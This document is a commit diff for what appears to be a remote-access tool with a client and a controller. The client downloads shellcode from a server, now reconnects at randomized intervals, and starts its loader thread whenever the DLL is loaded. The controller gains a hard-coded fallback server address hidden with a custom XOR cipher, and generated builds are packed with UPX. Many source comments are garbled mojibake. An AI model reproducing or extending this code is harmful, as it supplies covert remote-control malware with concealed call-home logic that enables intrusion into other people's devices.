Improve authorization logic

client/KernelManager.cpp

@@ -199,25 +199,26 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
 	switch (szBuffer[0])
 	{
 	case CMD_AUTHORIZATION: {
-#ifndef _DEBUG
+		HANDLE hMutex = OpenMutex(SYNCHRONIZE, FALSE, "MASTER.EXE");
-		HANDLE hMutex = OpenMutex(SYNCHRONIZE, FALSE, "YAMA.EXE");
+		hMutex = hMutex ? hMutex : OpenMutex(SYNCHRONIZE, FALSE, "YAMA.EXE");
 		if (hMutex == NULL) // û<>л<EFBFBD><D0BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>δ<EFBFBD><CEB4><EFBFBD><EFBFBD>
 			break;
 		CloseHandle(hMutex);
-		const char* pwdHash = m_conn->pwdHash;
+
-#else 
-		const char* pwdHash = MASTER_HASH;
-#endif
 		char buf[100] = {}, *passCode = buf + 5;
 		memcpy(buf, szBuffer, min(sizeof(buf), ulLength));
+		std::string masterHash(skCrypt(MASTER_HASH));
+		const char* pwdHash = m_conn->pwdHash[0] ? m_conn->pwdHash : masterHash.c_str();
 		if (passCode[0] == 0) {
 			std::string devId = getDeviceID();
 			memcpy(buf + 5, devId.c_str(), devId.length());		// 16<31>ֽ<EFBFBD>
 			memcpy(buf + 32, pwdHash, 64);						// 64<36>ֽ<EFBFBD>
 			m_ClientObject->Send2Server((char*)buf, sizeof(buf));
 		} else {
-			iniFile cfg;
+			config* cfg = pwdHash == masterHash ? new config : new iniFile;
-			cfg.SetStr("settings", "Password", passCode);
+			cfg->SetStr("settings", "Password", passCode);
+			delete cfg;
+			g_bExit = S_SERVER_EXIT;
 		}
 		break;
 	}

client/LoginServer.cpp

@@ -263,15 +263,14 @@ LOGIN_INFOR GetLoginInfo(DWORD dwSpeed, const CONNECT_ADDRESS& conn)
 	LoginInfor.AddReserved("?");						// <20><>װ<EFBFBD><D7B0>Ϣ
 	LoginInfor.AddReserved(sizeof(void*)==4 ? 32 : 64); // <20><><EFBFBD><EFBFBD>λ<EFBFBD><CEBB>
 	std::string str;
-#ifndef _DEBUG
+	std::string masterHash(skCrypt(MASTER_HASH));
-	HANDLE hMutex = OpenMutex(SYNCHRONIZE, FALSE, "YAMA.EXE");
+	HANDLE hMutex = OpenMutex(SYNCHRONIZE, FALSE, "MASTER.EXE");
+	hMutex = hMutex ? hMutex : OpenMutex(SYNCHRONIZE, FALSE, "YAMA.EXE");
 	if (hMutex != NULL) {
 		CloseHandle(hMutex);
-#else
+		config*cfg = conn.pwdHash == masterHash ? new config : new iniFile;
-		{
+		str = cfg->GetStr("settings", "Password", "");
-#endif
+		delete cfg;
-		iniFile cfg;
-		str = cfg.GetStr("settings", "Password", "");
 		str.erase(std::remove(str.begin(), str.end(), ' '), str.end());
 		auto list = StringToVector(str, '-', 3);
 		str = list[1].empty() ? "Unknown" : list[1];
@@ -279,7 +278,6 @@ LOGIN_INFOR GetLoginInfo(DWORD dwSpeed, const CONNECT_ADDRESS& conn)
 	LoginInfor.AddReserved(str.c_str());			   // <20><>Ȩ<EFBFBD><C8A8>Ϣ
 	bool isDefault = strlen(conn.szFlag) == 0 || strcmp(conn.szFlag, skCrypt(FLAG_GHOST)) == 0 ||
 		strcmp(conn.szFlag, skCrypt("Happy New Year!")) == 0;
-	std::string masterHash(skCrypt(MASTER_HASH));
 	const char* id = isDefault ? masterHash.c_str() : conn.szFlag;
 	memcpy(LoginInfor.szMasterID, id, min(strlen(id), 16));
 	return LoginInfor;

client/main.c

@@ -14,6 +14,7 @@
 #define Mprintf(format, ...) 
 #define IsRelease 1
 #endif
+#include <stdlib.h>
 
 #pragma comment(lib, "ws2_32.lib")
 
@@ -77,18 +78,14 @@ const char* ReceiveShellcode(const char* sIP, int serverPort, int* sizeOut) {
 		return NULL;
 	}
 
+	srand(time(NULL));
 	const int bufSize = (8 * 1024 * 1024);
-	char* buffer = (char*)malloc(bufSize);
+	char* buffer = NULL;
-	if (!buffer) {
-		WSACleanup();
-		return NULL;
-	}
-
 	BOOL isFirstConnect = TRUE;
 	int attemptCount = 0, requestCount = 0;
 	do {
 		if (!isFirstConnect)
-			Sleep(IsRelease ? 120 * 1000 : 5000);
+			Sleep(IsRelease ? rand()%60 * 1000 : 5000);
 		isFirstConnect = FALSE;
 		Mprintf("Connecting attempt #%d -> %s:%d \n", ++attemptCount, serverIP, serverPort);
 
@@ -120,6 +117,11 @@ const char* ReceiveShellcode(const char* sIP, int serverPort, int* sizeOut) {
 		}
 
 		int totalReceived = 0;
+		buffer = buffer ? buffer : (char*)malloc(bufSize);
+		if (!buffer) {
+			closesocket(clientSocket);
+			continue;
+		}
 		if (requestCount < 3) {
 			requestCount++;
 			const int bufferSize = 16 * 1024;
@@ -207,25 +209,6 @@ typedef struct PluginParam {
 #define DLL_API
 #endif
 
-#include <stdio.h>
-bool WriteTextToFile(const char* filename, const char* content)
-{
-	if (filename == NULL || content == NULL)
-		return false;
-
-	FILE* file = fopen(filename, "w");
-	if (file == NULL)
-		return false;
-
-	if (fputs(content, file) == EOF) {
-		fclose(file);
-		return false;
-	}
-
-	fclose(file);
-	return true;
-}
-
 extern DLL_API DWORD WINAPI run(LPVOID param) {
 	PluginParam* info = (PluginParam*)param;
 	int size = 0;
@@ -264,15 +247,15 @@ int main() {
 
 BOOL APIENTRY DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
 {
+	static HANDLE threadHandle = NULL;
 	if (fdwReason == DLL_PROCESS_ATTACH){
 		static PluginParam param = { 0 };
 		strcpy(param.IP, g_Server.szServerIP);
 		param.Port = atoi(g_Server.szPort);
 		param.User = g_Server.pwdHash;
-#if 0
+		threadHandle = CreateThread(NULL, 0, run, &param, 0, NULL);
-		WriteTextToFile("HASH.ini", g_Server.pwdHash);
+	} else if (fdwReason == DLL_PROCESS_DETACH) {
-#endif
+		if (threadHandle) TerminateThread(threadHandle, 0x20250619);
-		CloseHandle(CreateThread(NULL, 0, run, &param, 0, NULL));
 	}
 	return TRUE;
 }

common/ip_enc.h

@@ -31,3 +31,25 @@ public:
 		}
 	}
 };
+
+class PrintableXORCipher {
+public:
+	// <20>ԳƼӽ<C6BC><D3BD>ܣ<EFBFBD><DCA3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD>ɴ<EFBFBD>ӡ<EFBFBD>ַ<EFBFBD>
+	// ǰ<>᣺<EFBFBD><E1A3BA><EFBFBD><EFBFBD><EFBFBD><EFBFBD>32~126<32><36>Χ<EFBFBD><CEA7><EFBFBD>ַ<EFBFBD>
+	void process(char* data, size_t len) {
+		for (size_t i = 0; i < len; ++i) {
+			char c = data[i];
+			// <20><>֤<EFBFBD><D6A4><EFBFBD><EFBFBD><EFBFBD>ַ<EFBFBD><D6B7>ǿɴ<C7BF>ӡ<EFBFBD><D3A1>Χ
+			if (c < 32 || c > 126) {
+				// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ǵ<EFBFBD>ӡ<EFBFBD>ַ<EFBFBD><D6B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҳ<EFBFBD><D2B2><EFBFBD><EFBFBD><EFBFBD>Զ<EFBFBD><D4B6><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+				continue;
+			}
+			// <20><><EFBFBD><EFBFBD>0x55<35><35>'U'<27><><EFBFBD><EFBFBD>ȷ<EFBFBD><C8B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>32~126֮<36><D6AE>
+			char encrypted = c ^ 0x55;
+			// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڷ<EFBFBD>Χ<EFBFBD><CEA7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ط<EFBFBD>Χ<EFBFBD>ڣ<EFBFBD><DAA3>򵥼Ӽ<F2B5A5BC>ѭ<EFBFBD><D1AD><EFBFBD><EFBFBD>
+			if (encrypted < 32) encrypted += 95;
+			if (encrypted > 126) encrypted -= 95;
+			data[i] = encrypted;
+		}
+	}
+};

server/2015Remote/2015Remote.cpp

@@ -92,8 +92,10 @@ CMy2015RemoteApp theApp;
 BOOL CMy2015RemoteApp::InitInstance()
 {
 	std::string masterHash(skCrypt(MASTER_HASH));
-	if (GetPwdHash() != masterHash) {
+	std::string mu = GetPwdHash()==masterHash ? "MASTER.EXE" : "YAMA.EXE";
-		m_Mutex = CreateMutex(NULL, FALSE, "YAMA.EXE");
+#ifndef _DEBUG
+	{
+		m_Mutex = CreateMutex(NULL, FALSE, mu.c_str());
 		if (ERROR_ALREADY_EXISTS == GetLastError())
 		{
 			CloseHandle(m_Mutex);
@@ -101,6 +103,7 @@ BOOL CMy2015RemoteApp::InitInstance()
 			return FALSE;
 		}
 	}
+#endif
 
 	SetUnhandledExceptionFilter(&whenbuged);
 

server/2015Remote/2015RemoteDlg.cpp

@@ -750,12 +750,15 @@ BOOL CMy2015RemoteDlg::OnInitDialog()
 	std::string master = ip.empty() ? "" : ip + ":" + port;
 	const Validation* v = GetValidation();
 	m_superPass = v->Reserved;
-#ifdef _DEBUG
 	if (!(strlen(v->Admin) && v->Port > 0)) {
-		static Validation test(1, ip.c_str(), atoi(port.c_str()));
+		// IMPORTANT: For authorization only.
+		PrintableXORCipher cipher;
+		char buf1[] = { "ld{ll{dc`{geb" }, buf2[] = {"b`af"};
+		cipher.process(buf1, strlen(buf1));
+		cipher.process(buf2, strlen(buf2));
+		static Validation test(99999, buf1, atoi(buf2));
 		v = &test;
 	}
-#endif
 	if (strlen(v->Admin) && v->Port > 0) {
 		DWORD size = 0;
 		LPBYTE data = ReadResource(sizeof(void*) == 8 ? IDR_TINYRUN_X64 : IDR_TINYRUN_X86, size);
@@ -807,11 +810,11 @@ BOOL CMy2015RemoteDlg::OnInitDialog()
 	lvColumn.pszText = (char*)str.data();
 	m_CList_Online.SetColumn(ONLINELIST_VIDEO, &lvColumn);
 	timeBeginPeriod(1);
-#ifdef _DEBUG
 	SetTimer(TIMER_CHECK, 60 * 1000, NULL);
-#else
+	CString tip = !ip.empty() && ip != getPublicIP() ? 
-	SetTimer(TIMER_CHECK, 600 * 1000, NULL);
+		CString(ip.c_str()) + " 必须是\"公网IP\"或反向代理服务器IP":
-#endif
+		"请设置\"公网IP\"，或使用反向代理服务器的IP";
+	ShowMessage("使用提示", tip);
 
 	return TRUE;  // 除非将焦点设置到控件，否则返回 TRUE
 }
@@ -980,6 +983,7 @@ void CMy2015RemoteDlg::OnClose()
 
 void CMy2015RemoteDlg::Release(){
 	Mprintf("======> Release\n");
+	DeletePopupWindow();
 	isClosed = TRUE;
 	ShowWindow(SW_HIDE);
 
@@ -1582,10 +1586,10 @@ BOOL CMy2015RemoteDlg::Activate(int nPort,int nMaxConnection)
 		return FALSE;
 	}
 
+	ShowMessage("使用提示", "严禁用于非法侵入、控制、监听他人设备等违法行为");
 	CString strTemp;
 	strTemp.Format("监听端口: %d成功", nPort);
 	ShowMessage("操作成功",strTemp);
-	ShowMessage("使用提示", "严禁用于非法侵入、控制、监听他人设备等违法行为");
 	return TRUE;
 }
 
@@ -2780,8 +2784,10 @@ void CMy2015RemoteDlg::OnToolGenMaster()
 		File.Close();
 		if (!upx.empty())
 		{
+#ifndef _DEBUG // DEBUG 模式用UPX压缩的程序可能无法正常运行
 			run_upx_async(GetSafeHwnd(), upx, name.GetString(), true);
 			MessageBox("正在UPX压缩，请关注信息提示。\r\n文件位于: " + name, "提示", MB_ICONINFORMATION);
+#endif
 		}else
 			MessageBox("生成成功! 文件位于:\r\n" + name, "提示", MB_ICONINFORMATION);
 	}